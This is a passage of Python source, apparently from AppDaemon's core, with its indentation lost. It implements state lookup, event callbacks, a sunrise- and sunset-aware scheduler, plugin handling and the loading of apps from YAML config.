raise ValueError("Invalid handle: {}".format(handle))
def get_entity(self, namespace, entity_id):
with self.state_lock:
if namespace in self.state:
if entity_id in self.state[namespace]:
return self.state[namespace][entity_id]
else:
return None
else:
self.log("WARNING", "Unknown namespace: {}".format(namespace))
return None
def get_state(self, namespace, device, entity, attribute):
with self.state_lock:
if device is None:
return deepcopy(self.state[namespace])
elif entity is None:
devices = {}
for entity_id in self.state[namespace].keys():
thisdevice, thisentity = entity_id.split(".")
if device == thisdevice:
devices[entity_id] = self.state[namespace][entity_id]
return deepcopy(devices)
elif attribute is None:
entity_id = "{}.{}".format(device, entity)
if entity_id in self.state[namespace]:
return deepcopy(self.state[namespace][entity_id]["state"])
else:
return None
else:
entity_id = "{}.{}".format(device, entity)
if attribute == "all":
if entity_id in self.state[namespace]:
return deepcopy(self.state[namespace][entity_id])
else:
return None
else:
if attribute in self.state[namespace][entity_id]["attributes"]:
return deepcopy(self.state[namespace][entity_id]["attributes"][
attribute])
elif attribute in self.state[namespace][entity_id]:
return deepcopy(self.state[namespace][entity_id][attribute])
else:
return None
def set_state(self, namespace, entity, state):
with self.state_lock:
self.state[namespace][entity] = state
#
# App State
#
async def appstate_loop(self):
while not self.stopping:
args = await self.appq.get()
namespace = args["namespace"]
await self.state_update(namespace, args)
self.appq.task_done()
def set_app_state(self, namespace, entity_id, state):
self.log("DEBUG", "set_app_state: {}".format(entity_id))
#print(state)
if entity_id is not None and "." in entity_id:
with self.state_lock:
if entity_id in self.state[namespace]:
old_state = self.state[namespace][entity_id]
else:
old_state = None
data = {"entity_id": entity_id, "new_state": state, "old_state": old_state}
args = {"namespace": namespace, "event_type": "state_changed", "data": data}
self.state[namespace][entity_id] = state
self.appq.put_nowait(args)
#
# Events
#
def add_event_callback(self, _name, namespace, cb, event, **kwargs):
with self.callbacks_lock:
if _name not in self.callbacks:
self.callbacks[_name] = {}
handle = uuid.uuid4()
with self.objects_lock:
self.callbacks[_name][handle] = {
"name": _name,
"id": self.objects[_name]["id"],
"type": "event",
"function": cb,
"namespace": namespace,
"event": event,
"kwargs": kwargs
}
return handle
def cancel_event_callback(self, name, handle):
with self.callbacks_lock:
if name in self.callbacks and handle in self.callbacks[name]:
del self.callbacks[name][handle]
if name in self.callbacks and self.callbacks[name] == {}:
del self.callbacks[name]
def info_event_callback(self, name, handle):
with self.callbacks_lock:
if name in self.callbacks and handle in self.callbacks[name]:
callback = self.callbacks[name][handle]
return callback["event"], callback["kwargs"].copy()
else:
raise ValueError("Invalid handle: {}".format(handle))
#
# Scheduler
#
def cancel_timer(self, name, handle):
self.log("DEBUG", "Canceling timer for {}".format(name))
with self.schedule_lock:
if name in self.schedule and handle in self.schedule[name]:
del self.schedule[name][handle]
if name in self.schedule and self.schedule[name] == {}:
del self.schedule[name]
# noinspection PyBroadException
def exec_schedule(self, name, entry, args):
try:
# Locking performed in calling function
if "inactive" in args:
return
# Call function
with self.objects_lock:
if "entity" in args["kwargs"]:
self.dispatch_worker(name, {
"name": name,
"id": self.objects[name]["id"],
"type": "attr",
"function": args["callback"],
"attribute": args["kwargs"]["attribute"],
"entity": args["kwargs"]["entity"],
"new_state": args["kwargs"]["new_state"],
"old_state": args["kwargs"]["old_state"],
"kwargs": args["kwargs"],
})
else:
self.dispatch_worker(name, {
"name": name,
"id": self.objects[name]["id"],
"type": "timer",
"function": args["callback"],
"kwargs": args["kwargs"],
})
# If it is a repeating entry, rewrite with new timestamp
if args["repeat"]:
if args["type"] == "next_rising" or args["type"] == "next_setting":
# It's sunrise or sunset - if the offset is negative we
# won't know the next rise or set time yet so mark as inactive
# So we can adjust with a scan at sun rise/set
if args["offset"] < 0:
args["inactive"] = 1
else:
# We have a valid time for the next sunrise/set so use it
c_offset = self.get_offset(args)
args["timestamp"] = self.calc_sun(args["type"]) + c_offset
args["offset"] = c_offset
else:
# Not sunrise or sunset so just increment
# the timestamp with the repeat interval
args["basetime"] += args["interval"]
args["timestamp"] = args["basetime"] + self.get_offset(args)
else: # Otherwise just delete
del self.schedule[name][entry]
except:
self.err("WARNING", '-' * 60)
self.err(
"WARNING",
"Unexpected error during exec_schedule() for App: {}".format(name)
)
self.err("WARNING", "Args: {}".format(args))
self.err("WARNING", '-' * 60)
self.err("WARNING", traceback.format_exc())
self.err("WARNING", '-' * 60)
if self.errfile != "STDERR" and self.logfile != "STDOUT":
# When explicitly logging to stdout and stderr, suppress
# verbose_log messages about writing an error (since they show up anyway)
self.log("WARNING", "Logged an error to {}".format(self.errfile))
self.err("WARNING", "Scheduler entry has been deleted")
self.err("WARNING", '-' * 60)
del self.schedule[name][entry]
def process_sun(self, action):
self.log(
"DEBUG",
"Process sun: {}, next sunrise: {}, next sunset: {}".format(
action, self.sun["next_rising"], self.sun["next_setting"]
)
)
with self.schedule_lock:
for name in self.schedule.keys():
for entry in sorted(
self.schedule[name].keys(),
key=lambda uuid_: self.schedule[name][uuid_]["timestamp"]
):
schedule = self.schedule[name][entry]
if schedule["type"] == action and "inactive" in schedule:
del schedule["inactive"]
c_offset = self.get_offset(schedule)
schedule["timestamp"] = self.calc_sun(action) + c_offset
schedule["offset"] = c_offset
def calc_sun(self, type_):
# convert to a localized timestamp
return self.sun[type_].timestamp()
def info_timer(self, handle, name):
with self.schedule_lock:
if name in self.schedule and handle in self.schedule[name]:
callback = self.schedule[name][handle]
return (
datetime.datetime.fromtimestamp(callback["timestamp"]),
callback["interval"],
self.sanitize_timer_kwargs(self.objects[name]["object"], callback["kwargs"])
)
else:
raise ValueError("Invalid handle: {}".format(handle))
def init_sun(self):
latitude = self.latitude
longitude = self.longitude
if -90 > latitude < 90:
raise ValueError("Latitude needs to be -90 .. 90")
if -180 > longitude < 180:
raise ValueError("Longitude needs to be -180 .. 180")
elevation = self.elevation
self.tz = pytz.timezone(self.time_zone)
self.location = astral.Location((
'', '', latitude, longitude, self.tz.zone, elevation
))
def update_sun(self):
#now = datetime.datetime.now(self.tz)
#now = pytz.utc.localize(self.get_now())
now = self.tz.localize(self.get_now())
mod = -1
while True:
try:
next_rising_dt = self.location.sunrise(
(now + datetime.timedelta(days=mod)).date(), local=False
)
if next_rising_dt > now:
break
except astral.AstralError:
pass
mod += 1
mod = -1
while True:
try:
next_setting_dt = self.location.sunset(
(now + datetime.timedelta(days=mod)).date(), local=False
)
if next_setting_dt > now:
break
except astral.AstralError:
pass
mod += 1
old_next_rising_dt = self.sun.get("next_rising")
old_next_setting_dt = self.sun.get("next_setting")
self.sun["next_rising"] = next_rising_dt
self.sun["next_setting"] = next_setting_dt
if old_next_rising_dt is not None and old_next_rising_dt != self.sun["next_rising"]:
# dump_schedule()
self.process_sun("next_rising")
# dump_schedule()
if old_next_setting_dt is not None and old_next_setting_dt != self.sun["next_setting"]:
# dump_schedule()
self.process_sun("next_setting")
# dump_schedule()
@staticmethod
def get_offset(kwargs):
if "offset" in kwargs["kwargs"]:
if "random_start" in kwargs["kwargs"] \
or "random_end" in kwargs["kwargs"]:
raise ValueError(
"Can't specify offset as well as 'random_start' or "
"'random_end' in 'run_at_sunrise()' or 'run_at_sunset()'"
)
else:
offset = kwargs["kwargs"]["offset"]
else:
rbefore = kwargs["kwargs"].get("random_start", 0)
rafter = kwargs["kwargs"].get("random_end", 0)
offset = random.randint(rbefore, rafter)
# verbose_log(conf.logger, "INFO", "sun: offset = {}".format(offset))
return offset
def insert_schedule(self, name, utc, callback, repeat, type_, **kwargs):
with self.schedule_lock:
if name not in self.schedule:
self.schedule[name] = {}
handle = uuid.uuid4()
utc = int(utc)
c_offset = self.get_offset({"kwargs": kwargs})
ts = utc + c_offset
interval = kwargs.get("interval", 0)
with self.objects_lock:
self.schedule[name][handle] = {
"name": name,
"id": self.objects[name]["id"],
"callback": callback,
"timestamp": ts,
"interval": interval,
"basetime": utc,
"repeat": repeat,
"offset": c_offset,
"type": type_,
"kwargs": kwargs
}
# verbose_log(conf.logger, "INFO", conf.schedule[name][handle])
return handle
def get_scheduler_entries(self):
schedule = {}
for name in self.schedule.keys():
schedule[name] = {}
for entry in sorted(
self.schedule[name].keys(),
key=lambda uuid_: self.schedule[name][uuid_]["timestamp"]
):
schedule[name][entry] = {}
schedule[name][entry]["timestamp"] = self.schedule[name][entry]["timestamp"]
schedule[name][entry]["type"] = self.schedule[name][entry]["type"]
schedule[name][entry]["name"] = self.schedule[name][entry]["name"]
schedule[name][entry]["basetime"] = self.schedule[name][entry]["basetime"]
schedule[name][entry]["repeat"] = self.schedule[name][entry]["basetime"]
schedule[name][entry]["offset"] = self.schedule[name][entry]["basetime"]
schedule[name][entry]["interval"] = self.schedule[name][entry]["basetime"]
schedule[name][entry]["kwargs"] = self.schedule[name][entry]["basetime"]
schedule[name][entry]["callback"] = self.schedule[name][entry]["callback"]
return schedule
def is_dst(self):
return bool(time.localtime(self.get_now_ts()).tm_isdst)
def get_now(self):
return datetime.datetime.fromtimestamp(self.now)
def get_now_ts(self):
return self.now
def now_is_between(self, start_time_str, end_time_str, name=None):
start_time = self.parse_time(start_time_str, name)
end_time = self.parse_time(end_time_str, name)
now = self.get_now()
start_date = now.replace(
hour=start_time.hour, minute=start_time.minute,
second=start_time.second
)
end_date = now.replace(
hour=end_time.hour, minute=end_time.minute, second=end_time.second
)
if end_date < start_date:
# Spans midnight
if now < start_date and now < end_date:
now = now + datetime.timedelta(days=1)
end_date = end_date + datetime.timedelta(days=1)
return start_date <= now <= end_date
def sunset(self):
return datetime.datetime.fromtimestamp(self.calc_sun("next_setting"))
def sunrise(self):
return datetime.datetime.fromtimestamp(self.calc_sun("next_rising"))
def parse_time(self, time_str, name=None):
parsed_time = None
parts = re.search('^(\d+):(\d+):(\d+)', time_str)
if parts:
parsed_time = datetime.time(
int(parts.group(1)), int(parts.group(2)), int(parts.group(3))
)
else:
if time_str == "sunrise":
parsed_time = self.sunrise().time()
elif time_str == "sunset":
parsed_time = self.sunset().time()
else:
parts = re.search(
'^sunrise\s*([+-])\s*(\d+):(\d+):(\d+)', time_str
)
if parts:
if parts.group(1) == "+":
parsed_time = (self.sunrise() + datetime.timedelta(
hours=int(parts.group(2)), minutes=int(parts.group(3)),
seconds=int(parts.group(4))
)).time()
else:
parsed_time = (self.sunrise() - datetime.timedelta(
hours=int(parts.group(2)), minutes=int(parts.group(3)),
seconds=int(parts.group(4))
)).time()
else:
parts = re.search(
'^sunset\s*([+-])\s*(\d+):(\d+):(\d+)', time_str
)
if parts:
if parts.group(1) == "+":
parsed_time = (self.sunset() + datetime.timedelta(
hours=int(parts.group(2)),
minutes=int(parts.group(3)),
seconds=int(parts.group(4))
)).time()
else:
parsed_time = (self.sunset() - datetime.timedelta(
hours=int(parts.group(2)),
minutes=int(parts.group(3)),
seconds=int(parts.group(4))
)).time()
if parsed_time is None:
if name is not None:
raise ValueError(
"{}: invalid time string: {}".format(name, time_str))
else:
raise ValueError("invalid time string: {}".format(time_str))
return parsed_time
def dump_sun(self):
self.diag("INFO", "--------------------------------------------------")
self.diag("INFO", "Sun")
self.diag("INFO", "--------------------------------------------------")
self.diag("INFO", self.sun)
self.diag("INFO", "--------------------------------------------------")
def dump_schedule(self):
if self.schedule == {}:
self.diag("INFO", "Schedule is empty")
else:
self.diag("INFO", "--------------------------------------------------")
self.diag("INFO", "Scheduler Table")
self.diag("INFO", "--------------------------------------------------")
for name in self.schedule.keys():
self.diag( "INFO", "{}:".format(name))
for entry in sorted(
self.schedule[name].keys(),
key=lambda uuid_: self.schedule[name][uuid_]["timestamp"]
):
self.diag(
"INFO",
" Timestamp: {} - data: {}".format(
time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(
self.schedule[name][entry]["timestamp"]
)),
self.schedule[name][entry]
)
)
self.diag("INFO", "--------------------------------------------------")
async def do_every(self, period, f):
#
# We already set self.now for DST calculation and initial sunset,
# but lets reset it at the start of the timer loop to avoid an initial clock skew
#
if self.starttime:
self.now = datetime.datetime.strptime(self.starttime, "%Y-%m-%d %H:%M:%S").timestamp()
else:
self.now = datetime.datetime.now().timestamp()
t = math.floor(self.now)
count = 0
t_ = math.floor(time.time())
while not self.stopping:
count += 1
delay = max(t_ + count * period - time.time(), 0)
await asyncio.sleep(delay)
t += self.interval
r = await f(t)
if r is not None and r != t:
# print("r: {}, t: {}".format(r,t))
t = r
t_ = r
count = 0
#
# Scheduler Loop
#
# noinspection PyBroadException,PyBroadException
async def do_every_tick(self, utc):
try:
start_time = datetime.datetime.now().timestamp()
self.now = utc
# If we have reached endtime bail out
if self.endtime is not None and self.get_now() >= self.endtime:
self.log("INFO", "End time reached, exiting")
if self.stop_function is not None:
self.stop_function()
else:
#
# We aren't in a standalone environment so the best we can do is terminate the AppDaemon parts
#
self.stop()
if self.realtime:
real_now = datetime.datetime.now().timestamp()
delta = abs(utc - real_now)
if delta > self.max_clock_skew:
self.log("WARNING",
"Scheduler clock skew detected - delta = {} - resetting".format(delta))
return real_now
# Update sunrise/sunset etc.
self.update_sun()
# Check if we have entered or exited DST - if so, reload apps
# to ensure all time callbacks are recalculated
now_dst = self.is_dst()
if now_dst != self.was_dst:
self.log(
"INFO",
"Detected change in DST from {} to {} -"
" reloading all modules".format(self.was_dst, now_dst)
)
# dump_schedule()
self.log("INFO", "-" * 40)
await utils.run_in_executor(self.loop, self.executor, self.check_app_updates, "__ALL__")
# dump_schedule()
self.was_dst = now_dst
# dump_schedule()
# test code for clock skew
# if random.randint(1, 10) == 5:
# time.sleep(random.randint(1,20))
# Process callbacks
# self.log("DEBUG", "Scheduler invoked at {}".format(now))
with self.schedule_lock:
for name in self.schedule.keys():
for entry in sorted(
self.schedule[name].keys(),
key=lambda uuid_: self.schedule[name][uuid_]["timestamp"]
):
if self.schedule[name][entry]["timestamp"] <= utc:
self.exec_schedule(name, entry, self.schedule[name][entry])
else:
break
for k, v in list(self.schedule.items()):
if v == {}:
del self.schedule[k]
end_time = datetime.datetime.now().timestamp()
loop_duration = (int((end_time - start_time) * 1000) / 1000) * 1000
self.log("DEBUG", "Scheduler loop compute time: {}ms".format(loop_duration))
if loop_duration > 900:
self.log("WARNING", "Excessive time spent in scheduler loop: {}ms".format(loop_duration))
return utc
except:
self.err("WARNING", '-' * 60)
self.err("WARNING", "Unexpected error during do_every_tick()")
self.err("WARNING", '-' * 60)
self.err( "WARNING", traceback.format_exc())
self.err("WARNING", '-' * 60)
if self.errfile != "STDERR" and self.logfile != "STDOUT":
# When explicitly logging to stdout and stderr, suppress
# verbose_log messages about writing an error (since they show up anyway)
self.log(
"WARNING",
"Logged an error to {}".format(self.errfile)
)
def process_meta(self, meta, namespace):
if meta is not None:
for key in self.required_meta:
if getattr(self, key) == None:
if key in meta:
# We have a value so override
setattr(self, key, meta[key])
def get_plugin_from_namespace(self, namespace):
if self.plugins is not None:
for name in self.plugins:
if "namespace" in self.plugins[name] and self.plugins[name]["namespace"] == namespace:
return name
if "namespace" not in self.plugins[name] and namespace == "default":
return name
else:
return None
async def notify_plugin_started(self, namespace, first_time=False):
try:
self.last_plugin_state[namespace] = datetime.datetime.now()
meta = await self.plugin_objs[namespace].get_metadata()
self.process_meta(meta, namespace)
if not self.stopping:
self.plugin_meta[namespace] = meta
state = await self.plugin_objs[namespace].get_complete_state()
with self.state_lock:
self.state[namespace] = state
if not first_time:
await utils.run_in_executor(self.loop, self.executor, self.check_app_updates, self.get_plugin_from_namespace(namespace))
else:
self.log("INFO", "Got initial state from namespace {}".format(namespace))
self.process_event("global", {"event_type": "plugin_started".format(namespace), "data": {"name": namespace}})
except:
self.err("WARNING", '-' * 60)
self.err("WARNING", "Unexpected error during notify_plugin_started()")
self.err("WARNING", '-' * 60)
self.err("WARNING", traceback.format_exc())
self.err("WARNING", '-' * 60)
if self.errfile != "STDERR" and self.logfile != "STDOUT":
# When explicitly logging to stdout and stderr, suppress
# verbose_log messages about writing an error (since they show up anyway)
self.log(
"WARNING",
"Logged an error to {}".format(self.errfile)
)
def notify_plugin_stopped(self, namespace):
self.process_event("global", {"event_type": "plugin_stopped".format(namespace), "data": {"name": namespace}})
#
# Utility Loop
#
async def utility(self):
#
# Wait for all plugins to initialize
#
initialized = False
while not initialized and self.stopping is False:
initialized = True
for plugin in self.plugin_objs:
if not self.plugin_objs[plugin].active():
initialized = False
break
await asyncio.sleep(1)
# Check if we need to bail due to missing metadata
for key in self.required_meta:
if getattr(self, key) == None:
# No value so bail
self.err("ERROR", "Required attribute not set or obtainable from any plugin: {}".format(key))
self.err("ERROR", "AppDaemon is terminating")
self.stop()
if not self.stopping:
#
# All plugins are loaded and we have initial state
#
if self.starttime:
new_now = datetime.datetime.strptime(self.starttime, "%Y-%m-%d %H:%M:%S")
self.log("INFO", "Starting time travel ...")
self.log("INFO", "Setting clocks to {}".format(new_now))
self.now = new_now.timestamp()
else:
self.now = datetime.datetime.now().timestamp()
self.thread_info["max_used"] = 0
self.thread_info["max_used_time"] = self.now
# Take a note of DST
self.was_dst = self.is_dst()
# Setup sun
self.init_sun()
self.update_sun()
# Create timer loop
self.log("DEBUG", "Starting timer loop")
self.loop.create_task(self.do_every(self.tick, self.do_every_tick))
if self.apps:
self.log("DEBUG", "Reading Apps")
await utils.run_in_executor(self.loop, self.executor, self.check_app_updates)
self.log("INFO", "App initialization complete")
#
# Fire APPD Started Event
#
self.process_event("global", {"event_type": "appd_started", "data": {}})
while not self.stopping:
start_time = datetime.datetime.now().timestamp()
try:
if self.apps:
if self.production_mode is False:
# Check to see if config has changed
await utils.run_in_executor(self.loop, self.executor, self.check_app_updates)
# Call me suspicious, but lets update state from the plugins periodically
# in case we miss events for whatever reason
# Every 10 minutes seems like a good place to start
for plugin in self.plugin_objs:
if self.plugin_objs[plugin].active():
if datetime.datetime.now() - self.last_plugin_state[plugin] > datetime.timedelta(
minutes=10):
try:
self.log("DEBUG",
"Refreshing {} state".format(plugin))
state = await self.plugin_objs[plugin].get_complete_state()
with self.state_lock:
self.state[plugin] = state
self.last_plugin_state[plugin] = datetime.datetime.now()
except:
self.log("WARNING",
"Unexpected error refreshing {} state - retrying in 10 minutes".format(plugin))
# Check for thread starvation
qsize = self.q.qsize()
if qsize > 0 and qsize % 10 == 0:
self.log("WARNING", "Queue size is {}, suspect thread starvation".format(self.q.qsize()))
self.dump_threads()
# Run utility for each plugin
for plugin in self.plugin_objs:
self.plugin_objs[plugin].utility()
except:
self.err("WARNING", '-' * 60)
self.err("WARNING", "Unexpected error during utility()")
self.err("WARNING", '-' * 60)
self.err("WARNING", traceback.format_exc())
self.err("WARNING", '-' * 60)
if self.errfile != "STDERR" and self.logfile != "STDOUT":
# When explicitly logging to stdout and stderr, suppress
# verbose_log messages about writing an error (since they show up anyway)
self.log(
"WARNING",
"Logged an error to {}".format(self.errfile)
)
end_time = datetime.datetime.now().timestamp()
loop_duration = (int((end_time - start_time) * 1000) / 1000) * 1000
self.log("DEBUG", "Util loop compute time: {}ms".format(loop_duration))
if loop_duration > (self.max_utility_skew * 1000):
self.log("WARNING", "Excessive time spent in utility loop: {}ms".format(loop_duration))
if self.check_app_updates_profile is True:
self.diag("INFO", "Profile information for Utility Loop")
self.diag("INFO", self.check_app_updates_profile_stats)
await asyncio.sleep(self.utility_delay)
#
# Stopping, so terminate apps.
#
self.check_app_updates(exit=True)
#
# AppDaemon API
#
def register_endpoint(self, cb, name):
handle = uuid.uuid4()
with self.endpoints_lock:
if name not in self.endpoints:
self.endpoints[name] = {}
self.endpoints[name][handle] = {"callback": cb, "name": name}
return handle
def unregister_endpoint(self, handle, name):
with self.endpoints_lock:
if name in self.endpoints and handle in self.endpoints[name]:
del self.endpoints[name][handle]
#
# App Management
#
def get_app(self, name):
with self.objects_lock:
if name in self.objects:
return self.objects[name]["object"]
else:
return None
def term_object(self, name):
with self.objects_lock:
term = None
if name in self.objects and hasattr(self.objects[name]["object"], "terminate"):
self.log("INFO", "Calling terminate() for {}".format(name))
# Call terminate directly rather than via worker thread
# so we know terminate has completed before we move on
term = self.objects[name]["object"].terminate
if term is not None:
try:
term()
except:
self.err("WARNING", '-' * 60)
self.err("WARNING", "Unexpected error running terminate() for {}".format(name))
self.err("WARNING", '-' * 60)
self.err("WARNING", traceback.format_exc())
self.err("WARNING", '-' * 60)
if self.errfile != "STDERR" and self.logfile != "STDOUT":
self.log("WARNING", "Logged an error to {}".format(self.errfile))
with self.objects_lock:
if name in self.objects:
del self.objects[name]
self.log("DEBUG", "Clearing callbacks for {}".format(name))
with self.callbacks_lock:
if name in self.callbacks:
del self.callbacks[name]
with self.schedule_lock:
if name in self.schedule:
del self.schedule[name]
with self.endpoints_lock:
if name in self.endpoints:
del self.endpoints[name]
def init_object(self, name):
app_args = self.app_config[name]
self.log("INFO",
"Initializing app {} using class {} from module {}".format(name, app_args["class"], app_args["module"]))
if self.get_file_from_module(app_args["module"]) is not None:
with self.objects_lock:
modname = __import__(app_args["module"])
app_class = getattr(modname, app_args["class"])
self.objects[name] = {
"object": app_class(
self, name, self.logger, self.error, app_args, self.config, self.app_config, self.global_vars
),
"id": uuid.uuid4()
}
init = self.objects[name]["object"].initialize
# Call its initialize function
try:
init()
except:
self.err("WARNING", '-' * 60)
self.err("WARNING", "Unexpected error running initialize() for {}".format(name))
self.err("WARNING", '-' * 60)
self.err("WARNING", traceback.format_exc())
self.err("WARNING", '-' * 60)
if self.errfile != "STDERR" and self.logfile != "STDOUT":
self.log("WARNING", "Logged an error to {}".format(self.errfile))
else:
self.log("WARNING", "Unable to find module module {} - {} is not initialized".format(app_args["module"], name))
def read_config(self):
new_config = None
if os.path.isfile(self.app_config_file):
self.log("WARNING", "apps.yaml in the Config directory is deprecated. Please move apps.yaml to the apps directory.")
new_config = self.read_config_file(self.app_config_file)
else:
for root, subdirs, files in os.walk(self.app_dir):
subdirs[:] = [d for d in subdirs if d not in self.exclude_dirs]
if root[-11:] != "__pycache__":
for file in files:
if file[-5:] == ".yaml":
self.log("DEBUG", "Reading {}".format(os.path.join(root, file)))
config = self.read_config_file(os.path.join(root, file))
valid_apps = {}
if type(config).__name__ == "dict":
for app in config:
if config[app] is not None:
if app == "global_modules":
valid_apps[app] = config[app]
elif "class" in config[app] and "module" in config[app]:
valid_apps[app] = config[app]
else:
if self.invalid_yaml_warnings:
self.log("WARNING",
"App '{}' missing 'class' or 'module' entry - ignoring".format(app))
else:
if self.invalid_yaml_warnings:
self.log("WARNING",
"File '{}' invalid structure - ignoring".format(os.path.join(root, file)))
if new_config is None:
new_config = {}
for app in valid_apps:
if app in new_config:
self.log("WARNING",
"File '{}' duplicate app: {} - ignoring".format(os.path.join(root, file), app))
else:
new_config[app] = valid_apps[app]
return new_config
def check_later_app_configs(self, last_latest):
if os.path.isfile(self.app_config_file):
ts = os.path.getmtime(self.app_config_file)
return {"latest": ts, "files": [{"name": self.app_config_file, "ts": os.path.getmtime(self.app_config_file)}]}
else:
later_files = {}
app_config_files = []
later_files["files"] = []
later_files["latest"] = last_latest
later_files["deleted"] = []
for root, subdirs, files in os.walk(self.app_dir):
subdirs[:] = [d for d in subdirs if d not in self.exclude_dirs]
if root[-11:] != "__pycache__":
for file in files:
if file[-5:] == ".yaml":
path = os.path.join(root, file)
app_config_files.append(path)
ts = os.path.getmtime(path)
if ts > last_latest:
later_files["files"].append(path)
if ts > later_files["latest"]:
later_files["latest"] = ts
for file in self.app_config_files:
if file not in app_config_files:
later_files["deleted"].append(file)
for file in app_config_files:
if file not in self.app_config_files:
later_files["files"].append(file)
self.app_config_files = app_config_files
return later_files
def read_config_file(self, file):
new_config = None
try:
with open(file, 'r') as yamlfd:
config_file_contents = yamlfd.read()
try:
new_config = yaml.load(config_file_contents)
except yaml.YAMLError as exc:
self.log("WARNING", "Error loading configuration")
if hasattr(exc, 'problem_mark'):
if exc.context is not None:
self.log("WARNING", "parser says")
self.log("WARNING", str(exc.problem_mark))
self.log("WARNING", str(exc.problem) + " " + str(exc.context))
else:
self.log("WARNING", "parser says")
self.log("WARNING", str(exc.problem_mark))
self.log("WARNING", str(exc.problem))
return new_config
except:
self.err("WARNING", '-' * 60)
self.err("WARNING", "Unexpected error loading config file: {}".format(file))
self.err("WARNING", '-' * 60)
self.err("WARNING", traceback.format_exc())
self.err("WARNING", '-' * 60)
if self.errfile != "STDERR" and self.logfile != "STDOUT":
self.log("WARNING", "Logged an error to {}".format(self.errfile))
# noinspection PyBroadException
def check_config(self):
terminate_apps = {}
initialize_apps = {}
try:
latest = self.check_later_app_configs(self.app_config_file_modified)
self.app_config_file_modified = latest["latest"]
if latest["files"] or latest["deleted"]:
self.log("INFO", "Reading config")
new_config = self.read_config()
if new_config is None:
self.log("WARNING", "New config not applied")
return
for file in latest["deleted"]:
self.log("INFO", "{} deleted".format(file))
for file in latest["files"]:
self.log("INFO", "{} added or modified".format(file))
# Check for changes
for name in self.app_config:
if name in new_config:
if self.app_config[name] != new_config[name]:
# Something changed, clear and reload
self.log("INFO", "App '{}' changed".format(name))
terminate_apps[name] = 1
initialize_apps[name] = 1
else:
# Section has been deleted, clear it out
self.log("INFO", "App '{}' deleted".format(name))
#
# Since the entry has been deleted we can't sensibly determine dependencies
# So just immediately terminate it
#
self.term_object(name)
for name in new_config:
if name not in self.app_config:
#
# New section added!
#
if "class" in new_config[name] and "module" in new_config[name]:
self.log("INFO", "App '{}' added".format(name))
initialize_apps[name] = 1
elif name == "global_modules":
pass
else:
if self.invalid_yaml_warnings:
self.log("WARNING", "App '{}' missing 'class' or 'module' entry - ignoring".format(name))
self.app_config = new_config
return {"init": initialize_apps, "term": terminate_apps}
except:
self.err("WARNING", '-' * 60)
self.err("WARNING", "Unexpected error:")
self.err("WARNING", '-' * 60)
self.err("WARNING", traceback.format_exc())
self.err("WARNING", '-' * 60)
if self.errfile != "STDERR" and self.logfile != "STDOUT":
self.log("WARNING", "Logged an error to {}".format(self.errfile))
def get_app_from_file(self, file):
module = self.get_module_from_path(file)
for app in self.app_config:
if "module" in self.app_config[app] and self.app_config[app]["module"] == module:
return app
return None
# noinspection PyBroadException
def read_app(self, file, reload=False):
name = os.path.basename(file)
module_name = os.path.splitext(name)[0]
# Import the App
if reload:
self.log("INFO", "Reloading Module: {}".format(file))
file, ext = os.path.splitext(name)
#
# Reload
#
try:
importlib.reload(self.modules[module_name])
except KeyError:
if name not in sys.modules:
# Probably failed to compile on initial load
# so we need to re-import not reload
self.read_app(file)
else:
# A real KeyError!
raise
else:
app = self.get_app_from_file(file)
if app is not None:
self.log("INFO", "Loading App Module: {}".format(file))
self.modules[module_name] = importlib.import_module(module_name)
elif "global_modules" in self.app_config and module_name in self.app_config["global_modules"]:
self.log("INFO", "Loading Global Module: {}".format(file))
self.modules[module_name] = importlib.import_module(module_name)
else:
if self.missing_app_warnings:
self.log("WARNING", "No app description found for: {} - ignoring".format(file))
@staticmethod
def get_module_from_path(path):
name = os.path.basename(path)
module_name = os.path.splitext(name)[0]
return module_name
def get_file_from_module(self, mod):
for file in self.monitored_files:
module_name = self.get_module_from_path(file)
if module_name == mod:
return file
return None
def process_filters(self):
if "filters" in self.config:
for filter in self.config["filters"]:
for root, subdirs, files in os.walk(self.app_dir, topdown=True):
# print(root, subdirs, files)
#
# Prune dir list
#
subdirs[:] = [d for d in subdirs if d not in self.exclude_dirs]
ext = filter["input_ext"]
extlen = len(ext) * -1
for file in files:
run = False
if file[extlen:] == ext:
infile = os.path.join(root, file)
modified = os.path.getmtime(infile)
if infile in self.filter_files:
if self.filter_files[infile] < modified:
run = True
else:
self.log("INFO", "Found new filter file {}".format(infile))
run = True
if run is True:
filtered = True
self.log("INFO", "Running filter on {}".format(infile))
self.filter_files[infile] = modified
# Run the filter
outfile = utils.rreplace(infile, ext, filter["output_ext"], 1)
command_line = filter["command_line"].replace("$1", infile)
command_line = command_line.replace("$2", outfile)
try:
p = subprocess.Popen(command_line, shell=True)
except:
self.log("WARNING", '-' * 60)
self.log("WARNING", "Unexpected running filter on: {}:".format(infile))
self.log("WARNING", '-' * 60)
self.log("WARNING", traceback.format_exc())
self.log("WARNING", '-' * 60)
@staticmethod
def file_in_modules(file, modules):
for mod in modules:
if mod["name"] == file:
return True
return False
#@_timeit
def check_app_updates(self, plugin=None, exit=False):
if not self.apps:
return
# Lets add some profiling
pr = None
if self.check_app_updates_profile is True:
pr = cProfile.Profile()
pr.enable()
# Process filters
self.process_filters()
# Get list of apps we need to terminate and/or initialize
apps = self.check_config()
found_files = []
modules = []
for root, subdirs, files in os.walk(self.app_dir, topdown=True):
# print(root, subdirs, files)
#
# Prune dir list
#
subdirs[:] = [d for d in subdirs if d not in self.exclude_dirs]
if root[-11:] != "__pycache__":
if root not in self.module_dirs:
self.log("INFO", "Adding {} to module import path".format(root))
sys.path.insert(0, root)
self.module_dirs.append(root)
for file in files:
if file[-3:] == ".py":
found_files.append(os.path.join(root, file))
for file in found_files:
if file == os.path.join(self.app_dir, "__init__.py"):
continue
try:
# check we can actually open the file
fh = open(file)
fh.close()
modified = os.path.getmtime(file)
if file in self.monitored_files:
if self.monitored_files[file] < modified:
modules.append({"name": file, "reload": True})
self.monitored_files[file] = modified
else:
self.log("DEBUG", "Found module {}".format(file))
modules.append({"name": file, "reload": False})
self. monitored_files[file] = modified
except IOError as err:
self.log("WARNING",
"Unable to read app {}: {} - skipping".format(file, err))
# Check for deleted modules and add them to the terminate list
deleted_modules = []
for file in self.monitored_files:
if file not in found_files or exit is True:
deleted_modules.append(file)
self.log("INFO", "Removing module {}".format(file))
for file in deleted_modules:
del self.monitored_files[file]
for app in self.apps_per_module(self.get_module_from_path(file)):
apps["term"][app] = 1
# Add any apps we need to reload because of file changes
for module in modules:
for app in self.apps_per_module(self.get_module_from_path(module["name"])):
if module["reload"]:
apps["term"][app] = 1
apps["init"][app] = 1
if "global_modules" in self.app_config:
